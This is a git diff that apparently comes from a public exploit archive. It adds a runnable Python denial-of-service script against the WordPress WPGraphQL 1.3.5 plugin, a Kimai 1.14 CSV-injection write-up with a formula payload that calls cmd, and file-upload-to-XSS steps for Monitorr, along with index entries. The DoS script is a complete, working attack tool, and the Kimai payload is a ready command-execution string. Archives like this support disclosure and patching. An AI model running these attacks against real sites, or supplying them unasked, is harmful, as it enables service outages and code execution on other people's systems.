diff --git a/exploits/php/dos/49807.py b/exploits/php/dos/49807.py new file mode 100755 index 000000000..b858f62bc --- /dev/null +++ b/exploits/php/dos/49807.py @@ -0,0 +1,55 @@ +# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service +# Author: Dolev Farhi +# Date: 2021-04-12 +# Vendor Homepage: https://www.wpgraphql.com/ +# Version: 1.3.5 +# Tested on: Ubuntu + + +""" + This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors. +""" + +import sys +import requests + + +def usage(): + print('* WordPress GraphQL 1.3.5 Denial of Service *') + print('python {} '.format(sys.argv[0])) + print('python {} http://site.com 10000 100'.format(sys.argv[0])) + sys.exit(1) + +if len(sys.argv) < 4: + print('Missing arguments!') + usage() + +def wpgql_exists(): + try: + r = requests.post(WORDPRESS_URL, json='x') + if 'GraphQL' in r.json()['errors'][0]['message']: + return True + except: + pass + return False + +# This PoC assumes graphql is located at index.php?graphql +WORDPRESS_URL = sys.argv[1] + '/index.php?graphql' +FORCE_MULTIPLIER = int(sys.argv[2]) +CHAINED_REQUESTS = int(sys.argv[3]) + +if wpgql_exists is False: + print('Could not identify GraphQL running at "/index.php?graphql"') + sys.exit(1) + +queries = [] + +payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER +query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'} + +for _ in range(0, CHAINED_REQUESTS): + queries.append(query) + +r = requests.post(WORDPRESS_URL, json=queries) +print('Time took: {} seconds '.format(r.elapsed.total_seconds())) +print('Response:', r.json()) \ No newline at end of file diff --git a/exploits/php/webapps/49805.txt b/exploits/php/webapps/49805.txt new file mode 100644 index 000000000..5e0ae8095 --- /dev/null +++ b/exploits/php/webapps/49805.txt @@ -0,0 +1,20 @@ +# Exploit Title: Kimai 1.14 - CSV Injection +# Date: 26/04/2021 +# Exploit Author: Mohammed Aloraimi +# Vendor Homepage: https://www.kimai.org/ +# Software Link: https://github.com/kevinpapst/kimai2 +# Version: 1.14 +# Payload: @SUM(1+9)*cmd|' /C calc'!A0 +# Tested on: Win10x64 +# Proof Of Concept: +CSV Injection (aka Excel Macro Injection or Formula Injection) exists in +creating new timesheet in Kimai. By filling the Description field with malicious +payload, it will be mistreated while exporting to a CSV file. + +To exploit this vulnerability: +1- Login as user. +2- Create new timesheet. +3- Fill the description with the malicious payload. +4- Save the timesheet. +5- Export it via CSV. +6- Open the CSV file, allow all popups and our payload is executed(calculator is opened). \ No newline at end of file diff --git a/exploits/php/webapps/49806.txt b/exploits/php/webapps/49806.txt new file mode 100644 index 000000000..1f8763d8e --- /dev/null +++ b/exploits/php/webapps/49806.txt @@ -0,0 +1,25 @@ +# Exploit Title: Montiorr 1.7.6m - File Upload to XSS +# Date: 25/4/2021 +# Exploit Author: Ahmad Shakla +# Software Link: https://github.com/Monitorr/Monitorr +# Tested on: Kali GNU/Linux 2020.2 +# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html + +An attacker can preform an XSS attack via image upload + +Steps : + +1)Create a payload with the following format : +>.png + +2) Install the database by going to the following link : +https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php + +3)Register for a new account on the server by going to the following link : +https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register + +4)Login with your credentials on the following link : +https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php + +5)Go to the following link and upload the payload : +https://monitorr.robyns-petshop.thm/settings.php#services-configuration \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 99976167e..fcba2bd35 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6779,6 +6779,7 @@ id,file,description,date,author,type,platform,port 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware, 49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple, 49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple, +49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -43976,3 +43977,5 @@ id,file,description,date,author,type,platform,port 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python, 49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",2021-04-26,nu11secur1ty,webapps,php, +49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",2021-04-27,"Mohammed Aloraimi",webapps,php, +49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - File Upload to XSS",2021-04-27,"Ahmad Shakla",webapps,php,